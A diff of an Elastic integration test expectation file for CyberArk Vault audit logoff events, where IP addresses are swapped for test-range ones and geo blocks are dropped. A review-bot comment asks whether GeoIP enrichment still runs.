 "original": "\u003c5\u003e1 2021-03-10T08:28:28Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 00:28:28\",\"IsoTimestamp\":\"2021-03-10T08:28:28Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}",
 "code": "8",
 "kind": "event",
@@ -250,7 +250,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-06-09T10:24:36.904220Z",
+ "ingested": "2021-12-09T13:37:11.641116600Z",
 "original": "\u003c5\u003e1 2021-03-10T08:28:29Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 00:28:29\",\"IsoTimestamp\":\"2021-03-10T08:28:29Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Prov_COMPONENTS\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}",
 "code": "8",
 "kind": "event",
@@ -317,7 +317,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-06-09T10:24:36.904221400Z",
+ "ingested": "2021-12-09T13:37:11.641122300Z",
 "original": "\u003c5\u003e1 2021-03-10T08:28:30Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 00:28:30\",\"IsoTimestamp\":\"2021-03-10T08:28:30Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"PVWAGWUser\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}",
 "code": "8",
 "kind": "event",
@@ -384,7 +384,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-06-09T10:24:36.904222700Z",
+ "ingested": "2021-12-09T13:37:11.641127700Z",
 "original": "\u003c5\u003e1 2021-03-10T08:28:30Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 00:28:30\",\"IsoTimestamp\":\"2021-03-10T08:28:30Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}",
 "code": "8",
 "kind": "event",
@@ -409,20 +409,8 @@
 }
 },
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "address": "81.32.170.205",
- "ip": "81.32.170.205"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -442,7 +430,7 @@
 "Administrator"
 ],
 "ip": [
- "81.32.170.205"
+ "67.43.156.13"
 ]
 },
 "cyberarkpas": {
@@ -450,7 +438,7 @@
 "severity": "Info",
 "rfc5424": true,
 "iso_timestamp": "2021-03-10T09:11:33Z",
- "station": "81.32.170.205",
+ "station": "67.43.156.13",
 "action": "Logoff",
 "message": "Logoff",
 "issuer": "Administrator",
@@ -463,8 +451,8 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-06-09T10:24:36.904223900Z",
- "original": "\u003c5\u003e1 2021-03-10T09:11:33Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:33\",\"IsoTimestamp\":\"2021-03-10T09:11:33Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}",
+ "ingested": "2021-12-09T13:37:11.641133Z",
+ "original": "\u003c5\u003e1 2021-03-10T09:11:33Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:33\",\"IsoTimestamp\":\"2021-03-10T09:11:33Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}",
 "code": "8",
 "kind": "event",
 "action": "logoff",
@@ -488,20 +476,8 @@
 }
 },
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "address": "81.32.170.205",
- "ip": "81.32.170.205"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -521,7 +497,7 @@
 "PSMP_ADB_localhost.localdomain"
 ],
 "ip": [
- "81.32.170.205"
+ "67.43.156.13"
 ]
 },
 "cyberarkpas": {
@@ -529,7 +505,7 @@
 "severity": "Info",
 "rfc5424": true,
 "iso_timestamp": "2021-03-10T09:12:20Z",
- "station": "81.32.170.205",
+ "station": "67.43.156.13",
 "action": "Logoff",
 "message": "Logoff",
 "issuer": "PSMP_ADB_localhost.localdomain",
@@ -542,8 +518,8 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-06-09T10:24:36.904225200Z",
- "original": "\u003c5\u003e1 2021-03-10T09:12:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:12:20\",\"IsoTimestamp\":\"2021-03-10T09:12:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"PSMP_ADB_localhost.localdomain\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}",
+ "ingested": "2021-12-09T13:37:11.641136800Z",
+ "original": "\u003c5\u003e1 2021-03-10T09:12:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:12:20\",\"IsoTimestamp\":\"2021-03-10T09:12:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"PSMP_ADB_localhost.localdomain\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}",
 "code": "8",
 "kind": "event",
 "action": "logoff",
@@ -567,20 +543,8 @@
 }
 },
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "address": "81.32.170.205",
- "ip": "81.32.170.205"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -600,7 +564,7 @@
 "PSMPGW_localhost.localdomain"
 ],
 "ip": [
- "81.32.170.205"
+ "67.43.156.13"
 ]
 },
 "cyberarkpas": {
@@ -608,7 +572,7 @@
 "severity": "Info",
 "rfc5424": true,
 "iso_timestamp": "2021-03-10T09:12:27Z",
- "station": "81.32.170.205",
+ "station": "67.43.156.13",
 "action": "Logoff",
 "message": "Logoff",
 "issuer": "PSMPGW_localhost.localdomain",
@@ -621,8 +585,8 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-06-09T10:24:36.904226400Z",
- "original": "\u003c5\u003e1 2021-03-10T09:12:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:12:27\",\"IsoTimestamp\":\"2021-03-10T09:12:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"PSMPGW_localhost.localdomain\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}",
+ "ingested": "2021-12-09T13:37:11.641141200Z",
+ "original": "\u003c5\u003e1 2021-03-10T09:12:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:12:27\",\"IsoTimestamp\":\"2021-03-10T09:12:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"PSMPGW_localhost.localdomain\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}",
 "code": "8",
 "kind": "event",
 "action": "logoff",
@@ -646,19 +610,8 @@
 }
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-VA",
- "country_name": "United States",
- "region_name": "Virginia",
- "location": {
- "lon": -77.2481,
- "lat": 38.6583
- },
- "country_iso_code": "US"
- },
- "address": "35.192.121.42",
- "ip": "35.192.121.42"
+ "address": "67.43.156.14",
+ "ip": "67.43.156.14"
 },
 "tags": [
 "preserve_original_event"
@@ -678,7 +631,7 @@
 "Administrator"
 ],
 "ip": [
- "35.192.121.42"
+ "67.43.156.14"
 ]
 },
 "cyberarkpas": {
@@ -686,7 +639,7 @@
 "severity": "Info",
 "rfc5424": true,
 "iso_timestamp": "2021-03-10T22:17:27Z",
- "station": "35.192.121.42",
+ "station": "67.43.156.14",
 "action": "Logoff",
 "message": "Logoff",
 "issuer": "Administrator",
@@ -699,8 +652,8 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-06-09T10:24:36.904256400Z",
- "original": "\u003c5\u003e1 2021-03-10T22:17:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:17:27\",\"IsoTimestamp\":\"2021-03-10T22:17:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"35.192.121.42\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}",
+ "ingested": "2021-12-09T13:37:11.641146500Z",
+ "original": "\u003c5\u003e1 2021-03-10T22:17:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:17:27\",\"IsoTimestamp\":\"2021-03-10T22:17:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}",
 "code": "8",
 "kind": "event",
 "action": "logoff",
@@ -724,20 +677,8 @@
 }
 },
 "destination": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "address": "81.32.170.205",
- "ip": "81.32.170.205"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
 },
 "source": {
 "address": "127.0.0.1",
@@ -765,7 +706,7 @@
 ],
 "ip": [
 "127.0.0.1",
- "81.32.170.205"
+ "67.43.156.13"
 ]
 },
 "cyberarkpas": {
@@ -773,9 +714,9 @@
 "severity": "Info",
 "rfc5424": true,
 "iso_timestamp": "2021-03-11T17:38:13Z",
- "gateway_station": "81.32.170.205",
+ "gateway_station": "67.43.156.13",
 "station": "127.0.0.1",
- "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:38:13\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:38:13Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e8\u003c/MessageID\u003e\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eLogoff\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eLogoff\u003c/Message\u003e\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e",
+ "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:38:13\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:38:13Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e8\u003c/MessageID\u003e\n 
\u003cDesc\u003eLogoff\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eLogoff\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eLogoff\u003c/Message\u003e\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e",
 "action": "Logoff",
 "message": "Logoff",
 "issuer": "Administrator",
@@ -788,8 +729,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.904258500Z", - "original": "\u003c5\u003e1 2021-03-11T17:38:13Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:13\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:13Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e8\u003c/MessageID\u003e\\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eLogoff\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eLogoff\u003c/Message\u003e\\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
09:38:13\",\"IsoTimestamp\":\"2021-03-11T17:38:13Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"81.32.170.205\"}}}", + "ingested": "2021-12-09T13:37:11.641151100Z", + "original": "\u003c5\u003e1 2021-03-11T17:38:13Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:13\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:13Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e8\u003c/MessageID\u003e\\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eLogoff\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eLogoff\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n 
\u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:13\",\"IsoTimestamp\":\"2021-03-11T17:38:13Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"67.43.156.13\"}}}", "code": "8", "kind": "event", "action": "logoff", @@ -813,20 +754,8 @@ } }, "destination": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "source": { "address": "10.0.2.2", @@ -854,7 +783,7 @@ ], "ip": [ "10.0.2.2", - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { 
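Review bot: In the `@@ -813,20 +754,8 @@` hunk the regenerated `destination` object drops the whole `geo` block instead of carrying geo data for `67.43.156.13`, so this expectation no longer asserts that GeoIP enrichment runs on the gateway-station address. If the point of moving to the supported subset is that these addresses resolve in the test GeoIP database, the expected file should presumably contain a `geo` object for them, and a missing block would indicate the enrichment did not fire when the expectation was regenerated rather than a change in pipeline behaviour. If the absence is intended, that is worth stating in the changelog description. The same drop appears in the `@@ -902,20 +831,8 @@`, `@@ -982,17 +899,8 @@` and `@@ -1059,33 +967,12 @@` hunks.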
@@ -862,9 +791,9 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-11T17:48:28Z", - "gateway_station": "81.32.170.205", + "gateway_station": "67.43.156.13", "station": "10.0.2.2", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:48:28\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:48:28Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e8\u003c/MessageID\u003e\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eLogoff\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eLogoff\u003c/Message\u003e\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:48:28\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:48:28Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e8\u003c/MessageID\u003e\n 
\u003cDesc\u003eLogoff\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eLogoff\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eLogoff\u003c/Message\u003e\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Logoff", "message": "Logoff", "issuer": "Administrator", 
